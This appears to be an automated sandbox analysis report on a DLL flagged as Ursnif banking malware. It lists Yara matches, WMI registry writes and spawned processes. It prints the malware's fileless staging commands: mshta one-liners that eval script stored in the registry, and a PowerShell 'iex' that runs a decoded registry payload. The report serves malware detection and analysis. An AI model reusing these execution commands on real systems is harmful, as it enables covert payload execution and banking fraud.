Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: gECym.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021B4 0_2_100021B4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00B67 0_2_00F00B67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00B69 0_2_00F00B69
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001540
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023D5 NtQueryVirtualMemory, 0_2_100023D5
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
PE / OLE file has an invalid certificate
Source: gECym.dll Static PE information: invalid certificate
Source: gECym.dll Virustotal: Detection: 10%
Source: gECym.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gECym.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3F2CDD13-31F2-11EC-90E5-ECF4BB570DC9}.dat
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF062D96AA82264A2D.TMP
Source: classification engine Classification label: mal100.troj.evad.winDLL@26/19@24/7
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A3 push ecx; ret 0_2_100021B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002150 push ecx; ret 0_2_10002159
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F008B1 push dword ptr [esp+0Ch]; ret 0_2_00F008C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F008B1 push dword ptr [esp+10h]; ret 0_2_00F0090B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F003B4 push dword ptr [ebp-00000284h]; ret 0_2_00F00423
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push dword ptr [ebp-00000284h]; ret 0_2_00F00724
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push dword ptr [ebp-0000028Ch]; ret 0_2_00F00778
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push edx; ret 0_2_00F007C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 push dword ptr [esp+10h]; ret 0_2_00F008B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00779 push edx; ret 0_2_00F007C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F0053F push dword ptr [ebp-00000284h]; ret 0_2_00F00575
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00725 push edx; ret 0_2_00F007C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00382 push dword ptr [ebp-00000284h]; ret 0_2_00F0053E
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001753 LoadLibraryA,GetProcAddress, 0_2_10001753
PE file contains an invalid checksum
Source: gECym.dll Static PE information: real checksum: 0x4a07a should be: 0x4445d
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
